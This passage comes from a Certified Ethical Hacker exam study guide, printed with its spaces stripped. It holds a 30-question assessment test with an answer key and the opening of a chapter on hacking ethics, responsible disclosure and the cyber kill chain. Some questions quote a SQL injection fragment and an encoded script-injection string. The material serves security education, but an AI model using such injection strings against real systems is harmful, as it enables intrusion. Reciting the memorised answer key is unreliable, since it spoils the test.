Introductionskiparoundasyouneed.Nochapterreliesonanyother.Theyallstandalonewithrespecttothecontent.However,ifyoudon’thavethefoundationandtrytojumptoalaterchapter,youmayfindyourselfgettinglostorconfusedbythematerial.Allyouneedtodoisjumpbacktosomeofthefoundationalchapters.Beyondthefoundationalmaterials,thebookgenerallyfollowsafairlystandardmethodologywhenitcomestoperformingsecuritytesting.ThismethodologywillbefurtherexplainedinChapter 1.Asaresult,youcanfollowalongwiththestepsofapenetrationtest/ethicalhackingengagement.Understandingtheoutlineandreasonforthemethodologywillalsobehelpfultoyou.Again,though,ifyouknowthematerial,youcanmovearoundasyouneed.ObjectiveMapTable I.1containsanobjectivemaptoshowyouataglancewhereyoucanfindeachobjectivecovered.Whiletherearechapterslistedforallofthese,therearesomeobjectivesthatarescatteredthroughoutthebook.Specifically,tools,systems,andprogramsgetatleasttouchedoninmostofthechapters.TABLEI.1 ObjectiveMapObjectiveChapterTasks1.1Systemsdevelopmentandmanagement7,141.2Systemsanalysisandaudits4,5,6,71.3Securitytestingandvulnerabilities7,81.4Reporting1,71.5 Mitigation7,81.6Ethics1Knowledge2.1Background2,32.2Analysis/assessment2,112.3Security3,13,142.4Tools,systems,programs4,5,6,7Introduction xxvObjectiveChapter2.5Procedures/methodology1,4,5,6,7,142.6Regulation/policy1,142.7Ethics1Let’sGetStarted!Thisbookisstructuredinawaythatyouwillbeledthroughfoundationalconceptsandthenthroughageneralmethodologyforethicalhacking.Youcanfeelfreetoselectyourownpathwaythroughthebook.Remember,whereverpossible,getyourhandsdirty.Getsomeexperiencewithtools,tactics,andproceduresthatyouarelessfamiliarwith.Itwillhelpyoualot.Taketheself-­assessment.Itmayhelpyougetabetterideaofhowyoucanmakethebestuseofthisbook.xxvi AssessmentTestAssessmentTest1.WhichheaderfieldisusedtoreassemblefragmentedIPpackets?A.DestinationaddressB.IPidentificationC.Don’tfragmentbitD.ToSfield2.Ifyouweretoseethefollowinginapacketcapture,whatwouldyouexpectwashappening?'or1=1;A.Cross-­sitescriptingB.CommandinjectionC.SQLinjectionD.XMLexternalentityinjection3.Whatmethodmightyouusetosuccessfullygetmalwareontoamobiledevice?A.ThroughtheAppleStoreorGooglePlayStoreB.ExternalstorageonanAndroidC.Third-­partyappstoreD.Jailbreaking4.WhatprotocolisusedtotakeadestinationIPaddressandgetapackettoadestinationonthelocalnetwork?A.DHCPB.ARPC.DNSD.RARP5.WhatwouldbetheresultofsendingthestringAAAAAAAAAAAAAAAAAintoavariablethathasbeenallocatedspacefor8bytes?A.HeapsprayingB.SQLinjectionC.BufferoverflowD.Slowlorisattack6.Ifyouweretoseethesubnetmask255.255.248.0,whatCIDRnotation(prefix)wouldyouusetoindicatethesamething?A./23B./22AssessmentTest xxviiC./21D./207.Whatistheprimarydifferencebetweenawormandavirus?A.Awormusespolymorphiccode.B.Avirususespolymorphiccode.C.Awormcanself-­propagate.D.Aviruscanself-­propagate.8.Howwouldyoucalculaterisk?A.Probability*lossB.Probability*mitigationfactorC.(Loss+mitigationfactor)*(loss/probability)D.Probability*mitigationfactor9.Howdoesaneviltwinattackwork?A.PhishingusersforcredentialsB.SpoofinganSSIDC.ChanginganSSIDD.Injectingfour-­wayhandshakes10.Toremovemalwareinthenetworkbeforeitgetstotheendpoint,youwouldusewhichofthefollowing?A.AntivirusB.ApplicationlayergatewayC.UnifiedthreatmanagementapplianceD.Statefulfirewall11.Whatisthepurposeofasecuritypolicy?A.Providinghigh-­levelguidanceontheroleofsecurityB.ProvidingspecificdirectiontosecurityworkersC.IncreasingthebottomlineofacompanyD.Aligningstandardsandpractices12.Whathasbeendonetothefollowingstring?%3Cscript%3Ealert('wubble');%3C/script%3EA.Base64encodingB.URLencodingC.EncryptionD.Cryptographichashingxxviii AssessmentTest13.Whatwouldyougetfromrunningthecommanddignsdomain.com?A.Mailexchangerrecordsfordomain.comB.Nameserverrecordsfordomain.comC.Cachingnameserverfordomain.comD.IPaddressforthehostnamens14.Whattechniquewouldyouideallyusetoget allofthehostnamesassociatedwithadomain?A.DNSqueryB.ZonecopyC.ZonetransferD.Recursiverequest15.IfyouweretonoticeoperatingsystemcommandsinsideaDNSrequestwhilelookingatapacketcapture,whatmightyoubelookingat?A.TunnelingattackB.DNSamplificationC.DNSrecursionD.XMLentityinjection16.Whatwouldbethepurposeofrunningapingsweep?A.Youwanttoidentifyresponsivehostswithoutaportscan.B.Youwanttousesomethingthatislightonnetworktraffic.C.Youwanttouseaprotocolthatmaybeallowedthroughthefirewall.D.Alloftheabove.17.HowmanyfunctionsarespecifiedbyNIST’scybersecurityframework?A.0B.3C.5D.418.WhatwouldbeonereasonnottowritemalwareinPython?A.ThePythoninterpreterisslow.B.ThePythoninterpretermaynotbeavailable.C.Thereisinadequatelibrarysupport.D.Pythonisahardlanguagetolearn.19.Ifyousawthefollowingcommandline,whatwouldyoubecapturing?tcpdump-­ieth2host192.168.10.5A.Trafficjustfrom192.168.10.5B.Traffictoandfrom192.168.10.5AssessmentTest xxixC.Trafficjustto192.168.10.5D.Alltrafficotherthanfrom192.168.86.520.WhatisDiffie-­Hellmanusedfor?A.KeymanagementB.KeyisolationC.KeyexchangeD.Keyrevocation21.Whichsocialengineeringprinciplemayallowaphonycallfromthehelpdesktobeeffective?A.SocialproofB.ImitationC.ScarcityD.Authority22.HowdoyouauthenticatewithSNMPv1?A.Username/passwordB.HashC.PublicstringD.Communitystring23.WhatistheprocessJavaprogramsidentifythemselvestoiftheyaresharingproceduresoverthenetwork?A.RMIregistryB.RMImapperC.RMIdatabaseD.RMIprocess24.WhatdowecallanARPresponsewithoutacorrespondingARPrequest?A.Is-­atresponseB.Who-­hasARPC.GratuitousARPD.IPresponse25.Whatarethethreetimesthataretypicallystoredaspartoffilemetadata?A.Moves,adds,changesB.Modified,accessed,deletedC.Moved,accessed,changedD.Modified,accessed,createdxxx AssessmentTest26.Whichoftheseisareasontouseanexploitagainstalocalvulnerability?A.PivotingB.LogmanipulationC.PrivilegeescalationD.Passwordcollection27.Whatprincipleisusedtodemonstratethatasignedmessagecamefromtheownerofthekeythatsignedit?A.NonrepudiationB.NonverifiabilityC.IntegrityD.Authority28.Whatisaviableapproachtoprotectingagainsttailgating?A.BiometricsB.BadgeaccessC.PhoneverificationD.Mantraps29.Whyisbluesnarfingpotentiallymoredangerousthanbluejacking?A.Bluejackingsends,whilebluesnarfingreceives.B.Bluejackingreceives,whilebluesnarfingsends.C.Bluejackinginstallskeyloggers.D.Bluesnarfinginstallskeyloggers.30.WhichofthesecuritytriadpropertiesdoestheBibasecuritymodelrelateto?A.ConfidentialityB.IntegrityC.AvailabilityD.AllofthemAnswersto AssessmentTest xxxiAnswersto AssessmentTest1.B.Thedestinationaddressisusedastheaddresstosendmessagesto.Thedon’tfragmentbitisusedtotellnetworkdevicesnottofragmentthepacket.TheTypeofService(ToS)fieldcanbeusedtoperformqualityofservice.TheIPidentificationfieldisusedtoidentifyfragmentsofthesamepacket,astheywouldallhavethesameIPidentificationnumber.2.C.ASQLinjectionattackmakesuseofSQLqueries,whichcanincludelogicthatmayaltertheflowoftheapplication.Intheexampleprovided,theintentistoforcetheresultoftheSQLquerytoalwaysreturnatrue.Itisquotedthewayitistoescapetheexistingqueryalreadyinplaceintheapplication.Noneoftheotherattacksusesasyntaxthatlooksliketheexample.3.C.TheAppleAppStoreandtheGooglePlayStorearecontrolledbyAppleandGoogle.It’snotimpossibletogetmalwareontomobiledevicesthatway,butit’sverydifficultbecauseappsgetrunthroughavettingprocess.WhilesomeAndroiddeviceswillsupportexternalstorage,it’snotaneffectivewaytogetmalwareontoasmartphoneorothermobiledevice.Jailbreakingcanleadtomalwarebeinginstalled,butit’snotthemeanstogetmalwareontoamobiledevice.Third-­partyappstorescanbeagoodmeanstogetmalwareontomobiledevicesbecausesomethird-­partyappstoresdon’tvetappsthataresubmitted.4.B.DHCPisusedtogetIPconfigurationtoendpoints.DNSisusedtoresolveahostnametoanIPaddressandviceversa.RARPisthereverseaddressprotocolusedtotakeaMACaddressandresolveittoanIPaddress.ARPisusedtoresolveanIPaddresstoaMACaddress.CommunicationonalocalnetworkrequirestheuseofaMACaddress.TheIPaddressisusedtogettosystemsoffthelocalnetwork.5.C.Heapsprayingusesdynamicallyallocatedspacetostoreattackcode.Aslowlorisattackisusedtoholdopenwebserverconnectionbuffers.ASQLinjectionwillbeusedtoinjectSQLqueriestothedatabaseserver.Abufferoverflowsendsmoredataintotheapplicationthanspacehasbeenallocatedfor.6.B.A/23 networkwouldbe255.255.254.0.A/22 wouldbe255.255.252.A/20 wouldbe255.255.240.0.Onlya/21 wouldgiveyoua255.255.248.0subnetmask.7.C.Bothwormsandvirusescouldbewrittentousepolymorphiccode,whichmeanstheycouldmodifywhattheylooklikeastheypropagate.Aworm,though,couldself-­propagate.It’stheonedistinctionbetweenwormsandviruses.Virusesrequiresomeinterventiononthepartoftheusertopropagateandexecute.8.A.Riskistheprobabilityoftheoccurrenceofaneventmultipliedbythedollarvalueofloss.Thereisnomitigationfactorthatisquantified,soitcouldbeputintoariskcalculation.9.B.Aneviltwinattackusesanaccesspointmasqueradingtobethepointofconnectionforstationstryingtoconnecttoalegitimatewirelessnetwork.Stationsreachouttomakeconnectionstothisaccesspointmasqueradingasanotheraccesspoint.Whileyoumayphishforcredentialsaspartofaneviltwinattack,credentialphishingisnothoweviltwinattackswork.SSIDsdon’tgetchangedaspartofaneviltwinattack,meaningnoSSIDthatexistsxxxii Answersto AssessmentTestwillbecomeanotherSSID.Injectingfour-­wayhandshakeswon’tdomuch,sincefour-­wayassumesbothendsarecommunicating,sotheinjectionofafullcommunicationstreamwillgetignored.10.C.Antivirussolutionsareusedonendpointsormaybeonemailservers.Statefulfirewallsaddtheabilitytofactorinthestateoftheconnection—­new,related,established.AnApplicationlayergatewayknowsaboutApplicationlayerprotocols.Aunifiedthreatmanagementapplianceaddscapabilitiesontopoffirewallfunctions,includingantivirus.11.A.Standardsandpracticesshouldbederivedfromasecuritypolicy,whichisthehigh-­levelguidanceontheroleofsecuritywithinanorganization.Securitydoesnotgenerallyincreasethebottomlineofacompany.Policiesarenotforprovidingspecificdirections,whichwouldbetheroleofprocedures.12.B.Base64encodingtakesnonprintablecharactersandencodestheminawaythattheycanberenderedintext.Encryptionwouldgenerallyrendertextunreadabletopeople.Acryptographichashisawayofgeneratingafixed-­lengthvaluetoidentifyavalue.URLencodingtakestextanduseshexadecimalvaluestorepresentthecharacters.ThisistextthathasbeenconvertedintohexadecimalsotheycanbeusedinaURL.13.B.MailexchangerrecordswouldbeidentifiedasMXrecords.Anameserverrecordisidentifiedwiththetagns.Whileanenterprisemayhaveoneorevenseveralcachingnameservers,thecachingnameserverwouldn’tbesaidtobelongtothedomainsinceitdoesn’thaveanydomainidentificationassociatedwithit.14.C.ADNSquerycanbeusedtoidentifyanIPaddressfromahostname,orviceversa.Youcouldpotentiallyuseabrute-­forcetechniquetoidentifyhostnames,thoughyoumaynotgeteverythingusingthatmethod.Arecursiverequestiscommonfromacachingservertogetanauthoritativeresponse.Thetermforgettingallthecontentsofthezoneisazone transfer.15.A.Tunnelingattackscanbeusedtohideoneprotocolinsideanother.Thismaybeusedtosendoperatingsystemcommandsusingatunnelsystem.ADNSamplificationattackiswhereasmallDNSrequestresultsinmuchlargerresponsessenttothetarget.DNSrecursionisusedtolookupinformationfromDNSservers.AnXMLentityinjectionattackisaweb-­basedattackandwouldn’tbefoundinsideaDNSrequest.16.D.Theremaybeseveralreasonsforperformingapingsweep.Youlikelywanttoidentifyresponsivehostsonthenetworksegmentyouaretargeting.Youmaynot,though,wanttouseafullportscan.ICMPisalightweightprotocol,andthereisachanceitwillbeallowedthroughthefirewall,sinceit’susedfortroubleshootinganddiagnostics.17.C.TheNISTcybersecurityframeworkspecifiesfivefunctions—­identify,protect,detect,respond,recover.18.B.Pythoninterpretersmaybeconsideredtobeslowertoexecutethanacompiledprogram;however,thedifferenceisnegligible,andgenerallyspeedofexecutionisn’tmuchofaconcernwhenitcomestomalware.Pythonisnotahardlanguagetolearn,andtherearealotofcommunity-­developedlibraries.Onechallenge,though,isthatyoumayneedaPythoninterpreter,unlessyougothroughthestepofgettingaPythoncompilerandcompilingyourscript.Windowssystemswouldn’tcommonlyhaveaPythoninterpreterinstalled.Answersto AssessmentTest xxxiii19.B.Theexpressionhost192.168.10.5isBPFindicatingthattcpdumpshouldonlycapturepacketstoandfrom192.168.10.5.Ifyouwantedtoonlygetittoorfrom,youwouldneedtomodifyhostwithsrcordest.20.C.Certificatescanberevoked,butthat’snotwhatDiffie-­Hellmanisusedfor.KeymanagementisamuchbroadertopicthanwhatDiffie-­Hellmanisusedfor.Diffie-­Hellmanisusedforkeyexchange.Itisaprocessthatallowspartiestoanencryptedconversationtomutuallyderivethesamekeystartingwiththesamebasevalue.21.D.Whileyoumightbeimitatingsomeone,imitationisnotasocialengineeringprinciple.Neithersocialproofnorscarcityisatplayinthissituation.However,ifyouarecallingfromthehelpdesk,youmaybeconsideredtobeinapositionofauthority.22.D.SNMPv3implementedusernameandpasswordauthentication.Withversion1,youusedacleartextcommunitystring.SNMPdoesn’tusehashes,andwhilethewordpublicisoftenusedasacommunitystring,apublicstringisnotawaytoauthenticatewithSNMPv1.23.A.Interprocesscommunicationsacrosssystemsusinganetworkiscalledremotemethodinvocation.TheprocessthatprogramshavetocommunicatewithtogetadynamicportallocationistheRMIregistry.ThisistheprogramyouquerytoidentifyservicesthatareavailableonasystemthathasimplementedRMI.24.C.WhenanARPresponseissentwithoutacorrespondingARPrequest,it’sanunexpectedorunnecessarymessage,soitisagratuitousARP.25.D.Therearethreedateandtimestampscommonlyusedinfilemetadata.Whenthefileiscreated,thatmomentisstored.Whenafileisaccessedbyauser,thatmomentisstored.Whenafileismodified,thatmomentisstored.Accessedisnotthesameasmodifiedsinceaccessingafilecouldberead-­only.Youcouldopenafile,expectingtomodifyitbutnotendingupdoingthemodification.Theaccesstimestillchanges.Whilemoves,adds,andchangesmaysometimesbereferredtoasMAClikemodified,accessed,andcreated,thosearenottasksassociatedwithfiletimes.26.C.Localvulnerabilitiesareusedagainstapplicationsthatarenotlisteningonthenetwork.Thismeanstheyrequireyoutobe“local”tothemachineandnotremote.Inotherwords,youhavetobeloggedinsomehow.Alocalvulnerabilitywouldnotbeusedtocollectpasswordssinceyoudon’tneedavulnerabilitytodothat.Similarly,youdon’tneedtomakeuseofavulnerabilitytomanipulatelogsortopivot.Mostofthosewouldrequireyoutohaveelevatedpermissions,though.Alocalvulnerabilitymaybeexploitedtogetyouthoseelevatedpermissions.27.A.IntegrityispartoftheCIAtriadbutisn’ttheprinciplethattiesasignedmessagebacktothesubjectofthesigningcertificate.Nonverifiabilityisnonsense,andauthorityisn’trelevanthere.Instead,nonrepudiationmeanssomeonecan’tsaytheydidn’tsendamessageifitwassignedwiththeirkeyandthatkeywasintheirpossessionandpassword-­protected.28.D.Biometricsandbadgeaccessareformsofphysicalaccesscontrol.Phoneverificationcouldpossiblybeusedasawayofverifyingidentity,butitwon’tprotectagainsttailgating.Amantrap,however,willprotectagainsttailgatingbecauseamantrapallowsonlyonepersoninatatime.xxxiv Answersto AssessmentTest29.B.BluesnarfingisanattackthatconnectstoaBluetoothdevicetograbdata fromthatdevice.BluejackingcanbeusedtosendinformationtoaBluetoothdevicethatisreceivingfromtheattacker,suchasatextmessage.Neitheroftheseattacksinstallskeyloggers.Thevictimdevicesendsinformationtotheattackerinabluesnarfingattack.30.B.TheBibasecuritymodelcoversdataintegrity.Whileothermodelscoverconfidentiality,noneofthemcoversavailability.Chapter1EthicalHackingTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Professionalcodeofconduct✓✓AppropriatenessofhackingWelcometotheexcitingworldofinformationsecurityand,specifically,theimportantworldofwhatisreferredtoasethicalhacking.You’reherebecauseyouwanttotaketheexamthatwillgetyoutheCertifiedEthicalHacker(CEH)certification.PerhapsyouhavedonethetrainingfromEC-­Council,theorganizationthatmanagestheCEH,andyouwantaresourcewithadifferentperspectivetohelpyouasyoupreparefortheexam.Oryou’vedecidedtogotheself-­studyrouteandyouhaveenoughexperiencetoqualifyfortheexam.Onewayoranother,you’reherenow,andthisbookwillhelpyouimproveyourunderstandingofthematerialtopreparefortheexam.Theexamcoversawiderangeoftopics,oftenatadeeplytechnicallevel,soyoureallyneedtohaveasolidunderstandingofthematerial.Thisisespeciallytrueifyouchoosetogoontothepracticalexam.Thischapter,however,willbeyourstartingpoint,andthereisnothingtechnicalhere.Init,you’llgetachancetounderstandthefoundationsoftheentireexam.First,you’lllearnjustwhatethicalhackingis,aswellaswhatitisn’t.Theimportantpartofthetermethicalhackingistheethicalpart.Whenyoutaketheexam,youwillbeexpectedtoabidebyacode.It’sessentialtounderstandthatcodesoyoucanlivebyitthroughoutyourentirecareer.Finally,you’lllearnwhatEC-­Councilis,aswellastheformatandotherdetailsoftheexamthatwillbeusefultoyou.Whilesomeofitmayseemtrivial,itcanbehelpfultogetabroadercontextforwhytheexamwascreatedandlearnabouttheorganizationthatrunsit.Personally,Ifinditusefultounderstandwhat’sunderneathsomethingratherthanexperienceitatasuperficiallevel.Asaresult,you’llgetthemacroexplanation,andyoucanchoosetouseitornot,dependingonwhetheryoufindithelpful.Itwon’tbepartoftheexam,butitmayhelpyouunderstandwhat’sbehindtheexamsoyouunderstandtheoverallintentions.Overviewof EthicsBeforewestarttalkingaboutethicalhacking,Iwillcoverthemostimportantaspectofthat,whichisethics.You’llnoticeit’snotreferredtoas“hackingethically.”It’sethicalhacking.Theimportantpartisinthefront.Ethicscanbeachallengingsubjectbecauseyouwillfindthatitisnotuniversal.Differentpeoplehavedifferentviewsofwhatisethicalandwhatisnotethical.It’sessential,though,thatyouunderstandwhatethicsareandwhatisconsideredethicalandunethicalfromtheperspectiveoftheCertifiedEthicalHackercertification.Thisisacriticalpartoftheexamandthecertification.Afterall,youarebeingentrustedwithaccesstosensitiveinformationandcriticalsystems.Tokeepyourselfviableasaprofessional,Overviewof Ethics 3youneedtobehaveandperformyourworkinanethicalmanner.Notonlywillyoubeexpectedtobehaveethically,youwillbeexpectedtoadheretoacodeofethics.Aspartofthecodeofethics,youwillbesworntokeepinformationyouobtainaspartofyourworkprivate,payingparticularattentiontoprotectingtheinformationandintellectualpropertyofemployersandclients.Whenyouareattackingsystemsthatbelongtootherpeople,youcouldbeprovidedwithinternalinformationthatissensitive.Youcouldalsocomeacrosssomecriticalinformationvitaltotheorganizationforwhichyouareworking.Failingtoprotectanyofthatdataviolatesthecodeofethicsbycompromisingtheconfidentialityofthatinformation.Youareexpectedtodiscloseinformationthatneedstobedisclosedtothepeoplewhohaveengagedyourservices.Thisincludesanyissuesthatyouhaveidentified.Youarealsoexpectedtodisclosepotentialconflictsofinterestthatyoumayhave.It’simportanttobetransparentinyourdealingsandalsodotherightthingwhenitcomestoprotectingyourclients,employers,andtheirbusinessinterests.Additionally,ifyoucomeacrosssomethingthatcouldhaveanimpactonalargenumberofpeopleacrosstheInternet,youareexpectedtodiscloseitinaresponsiblemanner.Thisdoesn’tmeandisclosingitinapublicforum.Itmeansworkingwithyouremployer,anyvendorthatmaybeinvolved,andanycomputeremergencyresponseteam(CERT)thatmayhavejurisdictionoveryourfindings.Thefirst-­timeresponsibledisclosurewasidentifiedanddocumentedinthe1990s,wellover20yearsago.ThesecurityresearcherRainForestPuppydevelopedafulldisclosurepolicy,sometimescalledtheRainForestPuppyPolicy(RFPorRFPolicy).Itadvocatedworkingcloselywithvendorstoensuretheyhadtimetofixissuesbeforeannouncingthem.Atthetime,therewasatendencyforso-­calledresearcherstojustpublishfindingstothepublictomakeanameforthemselveswithoutregardtothepossibilityofexposinginnocentpeoplewhenthevulnerabilitiestheyfoundwereexploitedbyattackers.Ontheotherside,companiesthatdevelopedsoftwarehadn’tcaughtupwiththeideathattheyneededtobeontopofvulnerabilities,andtheslowmonths-­oryears-­longpaceofsoftwaredevelopmentwasn’tpossibleanylongerwithwordofvulnerabilitiesgettingoutwithinminutesaroundtheworld.Hackersmayhavetriedtonotifyacompanyonlytohavethatcompanyignorethecontact.Othercompaniesmayhaveacknowledgedthebugbutthendraggedtheirfeetaboutgettingfixesouttotheircustomers.TheRFPolicywasanattempttoensurethatthosewhofoundvulnerabilitiesdidn’tjustannouncethemindiscriminatelybutalsohadtheabilitytomaketheannouncementifthecompanystartedtodragtheirfeet.Wideacceptanceofthispolicywithinthesecuritycommunitydramaticallyincreasedthecollaborationbetweenthosewhowerelookingforvulnerabilitiesandthosecompanieswhohadtobeconsciousoftheirconsumerswhomaybeexposedtoattackifvulnerabilitieswereannounced.Forexamplesofresponsibledisclosure,lookattheworkofDanKaminsky.HehasfoundseriousflawsintheimplementationsoftheDomainNameSystem(DNS),whichimpactseveryoneontheInternet.Heworkedresponsiblywithvendorstoensurethattheyhadtimetofixtheirimplementationsandremediatethevulnerabilitiesbeforehedisclosedthem.Intheend,hediddisclosethevulnerabilitiesinaverypublicmanner,butonlyaftervendorshadtimetofixtheissue.Thismeanthewasn’tputtingpeopleinthepathofcompromise4 Chapter1  EthicalHacking■andpotentialinformationdisclosure.Eventhoughhewasusingthesoftwareinawaythatitwasn’tintendedtobeused,hewasusinganethicalapproachbyattemptingtoaddressanissuebeforesomeonecouldmakeuseoftheissueinamaliciousway.Asyouperformwork,youwillbegivenaccesstoresourcesprovidedbytheclientorcompany.Underthecodeofethicsyouwillneedtoagreeto,youcannotmisuseanyoftheequipment.Youcan’tdamageanythingyouhaveaccesstoaspartofyouremploymentorcontract.Therewillbetimeswhenthetestingyouareperformingmaycausedamagetoaserviceprovidedbytheinfrastructureofthecompanyyouareworkingfororwith.Aslongasthisisunintentionaloragreedtobeacceptablebythecompany,thisisokay.Onewaytoalleviatethisconcernistokeeplinesofcommunicationopenatalltimes.Ifithappensthatanunexpectedoutageoccurs,ensuringthattherightpeopleknowsoitcanberemediedis essential.Perhapsitgoeswithoutsaying,butyouarenotallowedtoengageinanyillegalactions.Similarly,youcannothavebeenconvictedofanyfelony.Alongthesamelines,thoughit’snotdirectlyillegal,youcan’tbeinvolvedwithanygroupthatmaybeconsidered“blackhat,”meaningtheyareengagedinpotentiallyillegalactivities,suchasattackingcomputersystemsformaliciouspurposes.ColorfulTerminologyYoumayregularlyhearthetermswhitehat,blackhat,andgrayhat.White-­hathackersarepeoplewhoalwaysdotheirworkforgood.Black-­hathackers,probablynotsurprisingly,arepeoplewhodobadthings,generallyactionsthatareagainstthelaw.Gray-­hathackers,though,fallinthemiddle.Theyareworkingforgood,buttheyareusingthetechniquesofblack-­hathackers.Communicationisalsoimportantwhenyouembarkonanengagement,regardlessofwhetheryouareworkingoncontractorareafull-­timeemployee.Whenyouaretakingonanewengagement,it’sessentialtobeclearabouttheexpectationsforyourservices.Ifyouhavethescopeofyourservicesinwriting,everythingisclearanddocumented.Aslongaswhatyouarebeingaskedtodoisnotillegalandthescopeofactivitiesfallswithinsystemsrunbythecompanyyouareworkingfor,yourworkwouldbeconsideredethical.Ifyoustrayoutsideofthescopeofsystems,networks,andservices,youractionswouldbeconsideredunethical.Whenyoukeepyourinteractionsprofessionalandensurethatit’scompletelycleartoyouremployerwhatyouaredoing,aslongasyouractionsareagainstsystemsbelongingtoyouremployer,youshouldbeonsafegroundethically.Overviewof EthicalHacking 5Overviewof EthicalHackingThesedays,it’shardtolookatanysourceofnewswithoutseeingsomethingaboutdatatheft,Internet-­basedcrime,orvariousotherattacksagainstpeopleandbusinesses.Whatweseeinthenews,actually,arethebigissues,withlargenumbersofrecordscompromisedorbigcompaniesbreached.Whatyoudon’tseeisthenumberofsystemcompromiseswherethetargetoftheattackissomeone’spersonalcomputerorotherdevice.Consider,forexample,theMiraibotnet,whichinfectedsmaller,special-­purposedevicesrunningan embeddedimplementationofLinux.Thenumberofdevicesthoughttohavebeencompromisedandmadepartofthatbotnetiswellover100,000,withthepossibilityoftherebeingmorethanonemillion.Eachyear,millionsofnewpiecesofmalwarearecreated,oftenmakinguseofnewvulnerabilitiesthathavebeendiscovered.Since2005,therehasnotbeenayearwithoutatleast10 milliondatarecordscompromised.Intheyear2017,nearly200 millionrecordswerecompromised.ThesenumbersarejustfromtheUnitedStates.Toputthisintoperspective,thereareonlyabout250 millionadultsintheUnitedStates,soit’ssafetosaythateveryadulthashadtheirinformationcompromisednumeroustimes.Tobeclear,thedatarecordsthatwe’retalkingaboutbelongtoindividualpeopleandnottobusinesses.Thereisminimalaccountingofthetotalvalueofintellectualpropertythatmayhavebeenstolen,butit’sclearthatthecompromisehasbeenongoingforalongtime.Allofthisistosaythereisanurgentneedtoimprovehowinformationsecurityishandled.It’sbelievedthattoprotectagainstattacks,youhavetobeabletounderstandthoseattacks.Ideally,youneedtoreplicatetheattacks.Ifbusinessesaretestingattacksagainsttheirowninfrastructureearlyandoften,thosebusinessescouldbeinabetterpositiontoimprovetheirdefensesandkeeptherealattackersout.Thistypeoftestingiswhatethicalhackingreallyis.Itisallaboutferretingoutproblemswithagoalofimprovingtheoverallsecuritypostureofthetarget.Thismaybefora companyintermsoftheirinfrastructureorevendesktopsystems.Itmayalsobeperformingtestingagainstsoftwaretoidentifybugsthatcanbeusedtocompromisethesoftwareand,subsequently,thesystemwherethesoftwareisrunning.Theaimisnottobemaliciousbuttobeonthe“good”sidetomakethesituationbetter.Thisissomethingyoucouldbehiredorcontractedtoperformforabusiness.Theymayhaveasetofsystemsorwebapplicationstheywanttested.Youcouldalsohavesoftwarethatneedstobetested.Therearealotofpeoplewhoperformtestingonsoftware—­bothcommercialandopensource.Ethicalhackingcanbedoneundermanydifferentnames.Youmaynotalwaysseethetermethicalhacking,especiallywhenyouarelookingatjobtitles.Instead,youwillseethetermpenetrationtesting.It’sessentiallythesamething.Theideaofapenetrationtestistoattempttopenetratethedefensesofanorganization.Thatmayalsobethegoalofanethicalhacker.Youmayalsoseethetermredteaming,whichisgenerallyconsideredaspecifictype6 Chapter1  EthicalHacking■ofpenetrationtestwherethetestersareadversarialtotheorganizationandnetworkundertest.Aredteamerwouldactuallyactlikeanattacker,meaningtheywouldtrytobestealthysoasnottobedetected.Oneofthechallengingaspectsofthissortofactivityishavingtothinklikeanattacker.Testingofthisnatureisoftenchallengingandrequiresadifferentwayofthinking.Whendoinganysortoftesting,includingethicalhacking,amethodologyisimportant,asithelpsensurethatyouractionsarebothrepeatableandverifiable.Thereareanumberofmethodologiesyoumaycomeacross.Professionalswhohavebeendoingthistypeofworkforawhilemayhavedevelopedtheirownstyle.However,theywilloftenfollowcommonsteps,suchastheonesIamgoingtoillustrateaswemovethroughthechapter.EC-­CouncilhelpstoensurethatthisworkisdoneethicallybyrequiringanyonewhohasobtainedtheCertifiedEthicalHackercertificationtoagreetoacodeofconduct.ThiscodeofconductholdsthosewhohavetheirCEHcertificationtoasetofstandardsensuringthattheybehaveethically,inservicetotheiremployers.Theyareexpectedtonotdoharmandtoworktowardimprovingthesecuritypostureratherthandoingdamagetothatposture.MethodologiesAswithsomanythings,usingamethodologyisvaluablewhenitcomestoethicalhackingorsecuritytesting.Methodologiescanhelpwithconsistency,repeatability,andprocessimprovement.Consistencyisimportantbecauseyouwanttorunthesamesetsoftestsorprobesnomatterwhoyouaretestingagainst.Let’ssayyouareworkingwithacompanythatkeepsaskingyouback.Withoutconsistency,youmaymisssomefindingsfromonetesttoanother,whichmayletthemthinktheygotbetter,orthefindingdoesn’texistanylonger.Thiswouldbeabadimpressiontoleaveacompanywith.Similarly,repeatabilitygivesyoutheabilitytodothesametestseverytimeyouruntheassessment.Infact,ifyouareworkingwithateam,everyoneofyoushouldbeabletorunthesetsoftests.Again,youwanttobesurethatanyorganizationyouareassessingwillhavethesameperspectiveontheirsecurityposture,nomatterhowmanytimestheycometoyouandnomatterwhotheorganizationis.Therearesometestingorassessmentmethodologiesthatgetusedthroughouttheindustry.Theyaretypicallybuiltaroundexpectationsofwhatanattackerwoulddo.Whilethismayormaynotberealistic,therearesomeotherwaysofviewinghowattackersoperatethatareusefultounderstand.Thefirstisthecyberkillchain,andtheotheristheattackerlifecycle.Whenwegettolookatthemethodologyofethicalhacking,youwillseethesimilarities.CyberKillChainAcommonlyreferred-­toframeworkintheinformationsecurityspaceisthecyberkillchain.Akillchainisamilitaryconceptofthestructureofanattack.TheideaofakillchainisthatyoucanidentifywheretheattackerisintheirprocesssoyoucanadaptyourownresponseMethodologies 7tactics.LockheedMartin,adefensecontractor,adaptedthemilitaryconceptofakillchaintotheinformationsecurity(orcybersecurity)space.Figure 1.1showsthecyberkillchain,asdevelopedbyLockheedMartin.FIGURE 1.1 CyberkillchainPhasesoftheIntrusionKillChainReconnaissanceWeaponizationDeliveryResearch,identification,andselectionoftargets.Pairingremoteaccessmalwarewithexploitintoadeliverablepayload(e.g.,AdobePDFandMicrosoftOfficefiles).Transmissionofweapontotarget(e.g.,viaemailattachments,websites,orUSBdrives).ExploitationOncedelivered,theweapon’scodeistriggered,exploitingvulnerableapplicationsorsystems.InstallationTheweaponinstallsabackdooronatarget’ssystem,allowingpersistentaccess.Command&ControlOutsideservercommunicateswiththeweaponsproviding“hands-onkeyboardaccess”insidethetarget’snetwork.ActionsonObjectiveTheattackerworkstoachievetheobjectiveoftheintrusion,whichcanincludeexfiltrationordestructionofdata,orintrusionofanothertarget.Thefirststageofthecyberkillchainisreconnaissance.Thisiswheretheattackeridentifiestheirtargetaswellaspotentialpointsofattack.Thismayincludeidentifyingvulnerabilitiesthatcouldbeexploited.Theremaybealotofinformationaboutthetargetgatheredinthisphase,whichwillbeusefullaterintheattackprocess.Oncetheattackerhasidentifiedatarget,theyneedtodeterminehowtoattackthetarget.Thisiswhereweaponizationcomesin.Theattackermaycreateacustompieceofmalware,forinst